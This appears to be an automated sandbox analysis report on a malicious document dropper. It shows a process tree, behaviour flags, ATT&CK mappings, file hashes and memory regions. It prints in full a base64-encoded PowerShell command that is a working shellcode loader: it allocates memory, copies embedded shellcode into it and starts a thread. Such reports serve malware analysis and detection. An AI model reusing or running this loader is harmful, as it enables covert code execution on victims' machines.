ZAAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4AGUAMQAsADAAeAA3AGIALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA2ADkALAAwAHgAOAA4ACwAMAB4AGYANQAsADAAeAA3ADQALAAwAHgAOQBhACwAMAB4AGUANQAsADAAeABlADUALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeABiADAALAAwAHgANQA0ACwAMAB4AGEANgAsADAAeAA3ADUALAAwAHgANgBlACwAMAB4AGYAMgAsADAAeAA0ADYALAAwAHgAZQAwACwAMAB4ADkANQAsADAAeAA1ADUALAAwAHgAMQAxACwAMAB4ADkAYwAsADAAeAA5ADcALAAwAHgAOAAwACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANgA3ACwAMAB4AGUANwAsADAAeABlAGUALAAwAHgAOABhACwAMAB4AGYAZAAsADAAeAA0ADgALAAwAHgAOQA4ACwAMAB4AGYAMgAsADAAeAAxADEALAAwAHgANAA5ACwAMAB4ADUAOAAsADAAeABhADUALAAwAHgANwBiACwAMAB4ADQAOQAsADAAeAAzADAALAAwAHgAMQAxACwAMAB4AGQAOAAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADUAZQAsADAAeABmADUALAAwAHgAMABlACwAMAB4AGYANgAsADAAeABjAGIALAAwAHgAZgA2ACwAMAB4ADYANgAsADAAeABhAGIALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeAA4ADQALAAwAHgAOQAyACwAMAB4AGEAYgAsADAAeAAwADAALAAwAHgANwA2ACwAMAB4AGYAMQAsADAAeAAyAGQALAAwAHgANwBjACwAMAB4AGEAMQAsADAAeAAzAGYALAAwAHgANQA4ACwAMAB4ADYAYwAsADAAeAA3ADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGUAVABiAGMAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGUAVABiAGMALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAVABiAGMALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAFQATQApACkAOwAkAHcAeAB2ACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGQARABTACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGQARABTACAAJAB3AHgAdgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAB3AHgAdgAgACQAZQAiADsAfQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JAB3AEQAWAB5ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdwBEAFgAeQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwAxACwAMAB4AGIAYQAsADAAeAA0AGUALAAwAHgAZQAzACwAMAB4AGUANgAsADAAeAA4ADkALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAOAAzACwAMAB4AGUAZQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADUANgAsADAAeAAxADQALAAwAHgAMAAzACwAMAB4ADUANgAsADAAeAA1AGEALAAwAHgAMAAxACwAMAB4ADEAMwAsADAAeAA3ADUALAAwAHgAOABhACwAMAB4ADQANwAsADAAeABkAGMALAAwAHgAOAA2ACwAMAB4ADQAYQAsADAAeAAyADgALAAwAHgANQA0ACwAMAB4ADYAMwAsADAAeAA3AGIALAAwAHgANgA4ACwAMAB4ADAAMgAsADAAeABlADcALAAwAHgAMgBiACwAMAB4ADUAOAAsADAAeAA0ADAALAAwAHgAYQA1ACwAMAB4AGMANwAsADAAeAAxADMALAAwAHgAMAA0ACwAMAB4ADUAZQAsADAAeAA1AGMALAAwAHgANQAxACwAMAB4ADgAMQAsADAAeAA1ADEALAAwAHgAZAA1ACwAMAB4AGQAYwAsADAAeABmADcALAAwAHgANQBjACwAMAB4AGUANgAsADAAeAA0AGQALAAwAHgAYwBiACwAMAB4AGYAZgAsADAAeAA2ADQALAAwAHgAOABjACwAMAB4ADEAOAAsADAAeAAyADAALAAwAHgANQA1ACwAMAB4ADUAZgAsADAAeAA2AGQALAAwAHgAMgAxACwAMAB4ADkAMgAsADAAeAA4ADIALAAwAHgAOQBjACwAMAB4ADcAMwAsADAAeAA0AGIALAAwAHgAYwA4ACwAMAB4ADMAMwAsADAAeAA2ADQALAAwAHgAZgA4ACwAMAB4ADgANAAsADAAeAA4AGYALAAwAHgAMABmACwAMAB4AGIAMgAsADAAeAAwADkALAAwAHgAOAA4ACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAMgBiACwAMAB4AGIAOQAsADAAeABhADIALAAwAHgAMQA5ACwAMAB4ADcAMgAsADAAeAAxADkALAAwAHgANAA0ACwAMAB4AGMAZQAsADAAeAAwAGUALAAwAHgAMQAwACwAMAB4ADUAZQAsADAAeAAxADMALAAwAHgAMgBhACwAMAB4AGUAYQAsADAAeABkADUALAAwAHgAZQA3ACwAMAB4AGMAMAAsADAAeABlAGQALAAwAHgAMwBmACwAMAB4ADMANgAsADAAeAAyADgALAAwAHgANAAxACwAMAB4ADcAZQAsADAAeABmADcALAAwAHgAZABiACwAMAB4ADkAYgAsADAAeAA0ADYALAAwAHgAMwBmACwAMAB4ADAANAAsADAAeABlAGUALAAwAHgAYgBlACwAMAB4ADMAYwAsADAAeABiADkALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAzAGYALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA5AGYALAAwAHgAZQA3ACwAMAB4AGUAZQAsADAAeAAyADcALAAwAHgANwBiACwAMAB4ADEANgAsADAAeAAyADIALAAwAHgAYgAxACwAMAB4ADAAOAAsADAAeAAxADQALAAwAHgAOABmACwAMAB4AGIANQAsADAAeAA1ADcALAAwAHgAMwA4ACwAMAB4ADAAZQAsADAAeAAxADkALAAwAHgAZQBjACwAMAB4ADQANAAsADAAeAA5AGIALAAwAHgAOQBjACwAMAB4ADIAMwAsADAAeABjAGQALAAwAHgAZABmACwAMAB4AGIAYQAsADAAeABlADcALAAwAHgAOQA2ACwAMAB4ADgANAAsADAAeABhADMALAAwAHgAYgBlACwAMAB4ADcAMgAsADAAeAA2AGEALAAwAHgAZABiACwAMAB4AGEAMQAsADAAeABkAGQALAAwAHgAZAAzACwAMAB4ADcAOQAsADAAeABhADkALAAwAHgAZgAzACwAMAB4ADAAMAAsADAAeABmADAALAAwAHgAZgAwACwAMAB4ADkAYgAsADAAeABlADUALAAwAHgAMwA5ACwAMAB4ADAAYgAsADAAeAA1AGIALAAwAHgANgAyACwAMAB4ADQAOQAsADAAeAA3ADgALAAwAHgANgA5ACwAMAB4ADIAZAAsADAAeABlADEALAAwAHgAMQA2ACwAMAB4AGMAMQAsADAAeABhADYALAAwAHgAMgBmACwAMAB4AGUAMAAsADAAeAAyADYALAAwAHgAOQBkACwAMAB4ADgAOAAsADAAeAA3AGUALAAwAHgAZAA5ACwAMAB4ADEAZQAsADAAeABlADkALAAwAHgANQA3ACwAMAB4ADEAZAAsADAAeAA0AGEALAAwAHgAYgA5ACwAMAB4AGMAZgAsADAAeABiADQALAAwAHgAZgAzACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAMwA5ACwAMAB4ADIANgAsADAAeABjAGUALAAwAHgAMQBhACwAMAB4AGEAZAAsADAAeAA5ADIALAAwAHgAYQBmACwAMAB4ADgANAAsADAAeAAxAGMALAAwAHgANABkACwAMAB4AGIAMgAsADAAeABiAGEALAAwAHgANABmACwAMAB4AGQAMQAsADAAeAAzAGIALAAwAHgANQBjACwAMAB4ADMAZgAsADAAeABiADkALAAwAHgANgBiACwAMAB4AGYAMQAsADAAeABmAGYALAAwAHgANgA5ACwAMAB4AGMAYwAsADAAeABhADEALAAwAHgAOQA3ACwAMAB4ADYAMwAsADAAeABjADMALAAwAHgAOQBlACwAMAB4ADgANwAsADAAeAA4AGIALAAwAHgAMAA5ACwAMAB4AGIANwAsADAAeAAyAGQALAAwAHgANgA0ACwAMAB4AGUANAAsADAAeABlAGYALAAwAHgAZAA5ACwAMAB4ADEAZAAsADAAeABhAGQALAAwAHgANgA0ACwAMAB4ADcAOAAsADAAeABlADEALAAwAHgANwBiACwAMAB4ADAAMQAsADAAeABiAGEALAAwAHgANgA5ACwAMAB4ADgAOAAsADAAeABmADUALAAwAHgANwA0ACwAMAB4ADkAYQAsADAAeABlADUALAAwAHgAZQA1ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4ADUANAAsADAAeABhADYALAAwAHgANwA1ACwAMAB4ADYAZQAsADAAeABmADIALAAwAHgANAA2ACwAMAB4AGUAMAAsADAAeAA5ADUALAAwAHgANQA1ACwAMAB4ADEAMQAsADAAeAA5AGMALAAwAHgAOQA3ACwAMAB4ADgAMAAsADAAeAA1ADUALAAwAHgAMAAzACwAMAB4ADYANwAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADgAYQAsADAAeABmAGQALAAwAHgANAA4ACwAMAB4ADkAOAAsADAAeABmADIALAAwAHgAMQAxACwAMAB4ADQAOQAsADAAeAA1ADgALAAwAHgAYQA1ACwAMAB4ADcAYgAsADAAeAA0ADkALAAwAHgAMwAwACwAMAB4ADEAMQAsADAAeABkADgALAAwAHgAMQBhACwAMAB4ADIANQAsADAAeAA1AGUALAAwAHgAZgA1ACwAMAB4ADAAZQAsADAAeABmADYALAAwAHgAYwBiACwAMAB4AGYANgAsADAAeAA2ADYALAAwAHgAYQBiACwAMAB4ADUAYwAsADAAeAA5AGYALAAwAHgAOAA0ACwAMAB4ADkAMgAsADAAeABhAGIALAAwAHgAMAAwACwAMAB4ADcANgAsADAAeABmADEALAAwAHgAMgBkACwAMAB4ADcAYwAsADAAeABhADEALAAwAHgAMwBmACwAMAB4ADUAOAAsADAAeAA2AGMALAAwAHgANwAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABlAFQAYgBjAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABlAFQAYgBjAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABlAFQAYgBjACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3aw1qhto\3aw1qhto.cmdline"
6⤵
- Suspicious use of WriteProcessMemory
PID:4772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES802C.tmp" "c:\Users\Admin\AppData\Local\Temp\3aw1qhto\CSC6BABD39958A9456CB63A6BCD65EF60D0.TMP"
7⤵
PID:3212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:4272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Temp\3aw1qhto\3aw1qhto.dll
Filesize
3KB

MD5
055d5a471aeeb9ed7767436a9d58700c

SHA1
06dfc4f9cbc1f7923a56f2b77ea4d7a3084eaf36

SHA256
9ab2f623828e52e8da8cc05918eb0fc7266055ab4af4a61fd7c10618e27bbd6f

SHA512
bd32e3370d3f0ab2aeb40844aa06ac7a141c2f6832db2756e42111bb8706ecbb10d55a15a5ba3b46bb8f484ad25e6978545d89ec4623e1ee71c4ade7938ee58c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES802C.tmp
Filesize
1KB

MD5
52b81d5d617c4d959a44e86125ae0bcd

SHA1
0e6a1925bd47b399161becb4b8bab74533254aee

SHA256
daa2921155e6ce0fe0e270bed67f1f92c6b931bf1f7ea607b7ac67d03bdcdae8

SHA512
9117c0a876a17a5895e908d23a024ccc930df1f7d5e896c2330edf060f95842ad42d5d599ccbee1c5f5924bdf7992be5ceb94431713be09b43db43ae00684e05

Download Submit
C:\Users\Admin\AppData\Local\Temp\kasp.docx
Filesize
673KB

MD5
631cf09ea52514effa5e7c97ef473f2c

SHA1
c35c472b3587a03263425ab6321f2de51e1a5660

SHA256
b5b13c6ebbfc0914384d3fd432246f2304a969a52cdcd90f8975ba6199573d86

SHA512
0a2c66247acb68c17ed6a38480e1aee654eb5a444c92f84186f0512b945b0936ce0a336046e9ae37843dac940e979d6cff4a55ca1e55b5d4e8af2d945c92b9f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\word.bat
Filesize
6KB

MD5
f31ae7f977e63dbb98d05935377c5040

SHA1
5e257ea1e2a4767034977d2af93de6b84c32788b

SHA256
91703a36e362b846a9927a0c8b63d710899fac4ec2739bceb9f969b6cd7fbfc1

SHA512
aaa578c8979e7e4d9e282e73c5f9c28531b8074e88279c9acebd5153315f9aabbd60ebcc53d8a5398610ef707c237e94c95f6b94bab6ae48ccdc2949114dd7f6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3aw1qhto\3aw1qhto.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3aw1qhto\3aw1qhto.cmdline
Filesize
369B

MD5
9502d5140d6350dcf17412ad2b05574b

SHA1
b6636c7790ebab71d9dc40be130213a4954dc573

SHA256
b5dd78ecd46259df1dd8d93d5f55eb0a09c4fbbd2c54465bf7f93320f6330b25

SHA512
ad9ea052c128a6aa90bb0a206dd6b45b127744792dae1210ce6d879e3687accd2b350b7038526baff9f519a7af0783ce4af4e8fd1c5e038eeace993045023681

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3aw1qhto\CSC6BABD39958A9456CB63A6BCD65EF60D0.TMP
Filesize
652B

MD5
a39eede4e8ef41582aad3168331d6e32

SHA1
99e2ad67bf89d0388a8bf2a7512f77dc94e3c830

SHA256
9d6b4281c1ae9388fcc67812cb07ced1e1338fcb4b42e885db7759ac11f6b8db

SHA512
0dcd43dedc7d6e3c46e7f330a02e7bd3fa2ca8df4714e1f1e618ca7af7a235bb850a8fa640faa51aa6033d219c695516baf712713fa4ebd245e7e16aca0e8e44

Download Submit
memory/432-130-0x0000000074CC0000-0x0000000075271000-memory.dmp

Filesize
5.7MB

Download
memory/432-131-0x0000000073AC0000-0x00000000745C0000-memory.dmp

Filesize
11.0MB

Download
memory/432-132-0x0000000073230000-0x00000000739D8000-memory.dmp

Filesize
7.7MB

Download
memory/432-139-0x0000000073230000-0x00000000739D8000-memory.dmp

Filesize
7.7MB

Download
memory/432-138-0x0000000073AC0000-0x00000000745C0000-memory.dmp

Filesize
11.0MB

Download
memory/432-135-0x0000000074CC0000-0x0000000075271000-memory.dmp

Filesize
5.7MB

Download
memory/708-154-0x0000000000000000-mapping.dmp

Download
memory/3212-161-0x0000000000000000-mapping.dmp

Download
memory/4404-156-0x0000000000000000-mapping.dmp

Download
memory/4492-144-0x00007FFE82DF0000-0x00007FFE82E00000-memory.dmp

Filesize
64KB

Download
memory/4492-133-0x0000000000000000-mapping.dmp

Download
memory/4492-151-0x00007FFE806C0000-0x00007FFE806D0000-memory.dmp

Filesize
64KB

Download
memory/4492-140-0x00007FFE82DF0000-0x00007FFE82E00000-memory.dmp

Filesize
64KB

Download
memory/4492-143-0x00007FFE82DF0000-0x00007FFE82E00000-memory.dmp

Filesize
64KB

Download
memory/4492-142-0x00007FFE82DF0000-0x00007FFE82E00000-memory.dmp

Filesize
64KB

Download
memory/4492-155-0x00007FFE806C0000-0x00007FFE806D0000-memory.dmp

Filesize
64KB

Download
memory/4492-141-0x00007FFE82DF0000-0x00007FFE82E00000-memory.dmp

Filesize
64KB

Download
memory/4548-134-0x0000000000000000-mapping.dmp

Download
memory/4552-148-0x0000000006030000-0x0000000006096000-memory.dmp

Filesize
408KB

Download
memory/4552-153-0x0000000006C50000-0x0000000006C6A000-memory.dmp

Filesize
104KB

Download
memory/4552-152-0x0000000008030000-0x00000000086AA000-memory.dmp

Filesize
6.5MB

Download
memory/4552-150-0x0000000006730000-0x000000000674E000-memory.dmp

Filesize
120KB

Download
memory/4552-149-0x0000000006110000-0x0000000006176000-memory.dmp

Filesize
408KB

Download
memory/4552-147-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/4552-146-0x0000000005950000-0x0000000005F78000-memory.dmp

Filesize
6.2MB

Download
memory/4552-145-0x00000000030E0000-0x0000000003116000-memory.dmp

Filesize
216KB

Download
memory/4552-137-0x0000000000000000-mapping.dmp

Download
memory/4772-157-0x0000000000000000-mapping.dmp

Download